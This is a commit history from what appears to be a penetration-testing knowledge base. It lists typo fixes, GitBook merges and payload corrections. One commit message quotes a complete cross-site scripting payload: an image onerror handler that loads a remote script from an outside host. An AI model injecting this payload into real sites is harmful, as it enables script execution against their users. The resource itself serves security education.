Commit Graph

3769 Commits

Author SHA1 Message Date
Matthew Prain
ac9e066bb6
Add missing HTML form methods for POST exploits
"Form POST request" and "Form POST request through iframe" now have the correct POST method.
2023-05-05 10:24:18 +10:00
CPol
c469ce05ac
GITBOOK-3892: change request with no subject merged in GitBook 2023-05-04 23:22:39 +00:00
CPol
45baef631d
GITBOOK-3891: change request with no subject merged in GitBook 2023-05-04 20:55:36 +00:00
CPol
41e73ca3fd
GITBOOK-3890: change request with no subject merged in GitBook 2023-05-04 19:22:41 +00:00
CPol
7daae334b5
GITBOOK-3889: change request with no subject merged in GitBook 2023-05-04 18:51:08 +00:00
syselement
3ed41d5e00
Update README.md - SQLMap CheatSheet 2023-05-04 19:19:54 +02:00
bl13bl03p
4916da0f6e
Completed payload
Location: Line 896
Change: Added > to complete payload

`<img src=1 onerror="s=document.createElement('script');s.src='http://xss.rocks/xss.js';document.body.appendChild(s);">`
2023-05-03 19:27:46 +02:00
WebSec B.V
d1859526a9
Update README.md
Fixed a Typo
2023-05-03 00:36:11 +02:00
CPol
2b388335f4
GITBOOK-3888: change request with no subject merged in GitBook 2023-05-02 09:40:52 +00:00
CPol
68dbaa159b
GITBOOK-3887: change request with no subject merged in GitBook 2023-05-02 09:10:31 +00:00
CPol
5318efc1ad
GITBOOK-3886: change request with no subject merged in GitBook 2023-05-01 16:21:52 +00:00
CPol
504234542f
GITBOOK-3885: change request with no subject merged in GitBook 2023-04-30 22:29:45 +00:00
CPol
ecd03d0108
GITBOOK-3884: change request with no subject merged in GitBook 2023-04-30 21:54:03 +00:00
CPol
98facb9725
GITBOOK-3883: change request with no subject merged in GitBook 2023-04-30 21:23:47 +00:00
KeoOp
af31fe3b83
fix typo in pentesting-mysql.md 2023-04-29 17:34:39 +08:00
TomFox
86fd85255e
Update cypher-injection-neo4j.md 2023-04-27 12:03:10 +02:00
KeoOp
f034eb35f1
fix a missing space in a cypher-injection payload
fix a missing space in url in cypher-injection-neo4j.md
2023-04-27 11:24:52 +08:00
Lion Hellstern
03c8710605 find os language independent users group by using the SID 2023-04-26 18:49:29 +02:00
Carlos Polop
379f9c450b
Merge pull request #629 from websecnl/patch-2
Update README.md
2023-04-26 16:13:55 +02:00
WebSec B.V
f4453dadc1
Update README.md
Fixed Typo in the Link
2023-04-26 16:02:40 +02:00
Carlos Polop
575d54e2e5
Merge pull request #627 from LionelOvaert/patch-1
Update airbus ioxid article links
2023-04-26 15:56:32 +02:00
Carlos Polop
7ba2bfde94
Merge pull request #625 from sw33tr0ll/patch-1
fixed typo "NTML"->"NTLM"
2023-04-26 15:56:12 +02:00
Carlos Polop
3d0193ad04
Merge pull request #623 from Reelix/patch-4
Fixed missing return characters in RTSP samples
2023-04-26 15:55:58 +02:00
Carlos Polop
07ef1482c5
Merge pull request #622 from XHNan/patch-1
add missing semicolons in nginx conf flie
2023-04-26 15:55:28 +02:00
Carlos Polop
7c9b4c36c0
Merge pull request #621 from fssecur3/patch-2
Added more wordlists and a wordlist generation tool
2023-04-26 15:55:03 +02:00
Carlos Polop
7319f7ad64
Merge pull request #620 from michal-siedlecki/fix_typo_in_readme
fix typo in README.md
2023-04-26 15:54:17 +02:00
Carlos Polop
6537fdbc2b
Merge pull request #619 from CoolHandSquid/patch-1
DNS typo Fix 2
2023-04-26 15:54:02 +02:00
Carlos Polop
05839a81bc
Merge branch 'master' into patch-1 2023-04-26 15:53:56 +02:00
Carlos Polop
a62813bab5
Merge pull request #618 from CoolHandSquid/DNS-typo-Fix
DNS typo Fix
2023-04-26 15:53:05 +02:00
Carlos Polop
bcee308b40
Merge pull request #617 from CoolHandSquid/Ffuf-Vhost-typo-Fix-1
Ffuf Vhost typo Fix
2023-04-26 15:52:51 +02:00
Carlos Polop
e36ebc6dee
Merge pull request #616 from fssecur3/patch-1
Add special character to bypass file upload restrictions
2023-04-26 15:52:36 +02:00
Carlos Polop
943f57716f
Merge pull request #624 from websecnl/patch-1
Update README.md
2023-04-26 15:44:18 +02:00
carlospolop
5ec5b67e79 update twitter 2023-04-25 20:35:28 +02:00
Lionel Ovaert
289fd8f050
Update airbus ioxid article links 2023-04-24 00:34:35 +02:00
CPol
71c5d3bf94
GITBOOK-3882: change request with no subject merged in GitBook 2023-04-23 19:27:30 +00:00
CPol
05b150f7d2
GITBOOK-3881: change request with no subject merged in GitBook 2023-04-23 19:20:09 +00:00
Logan Evans
4c8c388665
Update spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md 2023-04-20 12:53:47 -07:00
WebSec B.V
6581bc5343
Update README.md
Added ReverseKit which is a tool we are sponsoring the development of we believe could be of great contribution towards the reverse engineering community.
2023-04-20 11:02:00 +02:00
Reelix
b2b6a64782
Fixed missing return characters in RTSP samples
The DESCRIBE examples were missing the required \r\n\r\n's - I added them back in.
2023-04-19 14:42:54 +02:00
CPol
a9e2d3b784
GITBOOK-3880: change request with no subject merged in GitBook 2023-04-19 03:00:28 +00:00
KeoOp
0c3c193d16
fix semicolon missing in nginx conf flie 2023-04-19 10:17:03 +08:00
CPol
34c27bc4e1
GITBOOK-3879: change request with no subject merged in GitBook 2023-04-18 23:46:39 +00:00
CPol
d8f6431f57
GITBOOK-3878: change request with no subject merged in GitBook 2023-04-18 14:22:56 +00:00
CPol
551efedf6a
GITBOOK-3877: change request with no subject merged in GitBook 2023-04-18 04:09:32 +00:00
CPol
679bd88424
GITBOOK-3876: change request with no subject merged in GitBook 2023-04-17 15:36:54 +00:00
CPol
bef0b1cc79
GITBOOK-3875: change request with no subject merged in GitBook 2023-04-17 15:16:32 +00:00
Francisco Spínola
2fabfe0079
Added more wordlists and a wordlist generation tool
- Added 5 sources for finding wordlists (Weakpass, Assetnote, Fuzzlists, Hashkiller, Bug Bounty Wordlists)
- Added 1 source for finding default credentials (InfoCentric)
- Added 1 tool to generate wordlists (Wister)
- Fixed 1 link (Google's Fuzzing wordlists)
2023-04-15 22:35:06 +01:00
Michał Siedlecki
11bf362b85
fix typo in README.md 2023-04-14 13:17:09 +02:00
CPol
28ce005c4a
GITBOOK-3874: change request with no subject merged in GitBook 2023-04-13 22:25:26 +00:00
CPol
dd44a81b21
GITBOOK-3873: change request with no subject merged in GitBook 2023-04-13 21:47:15 +00:00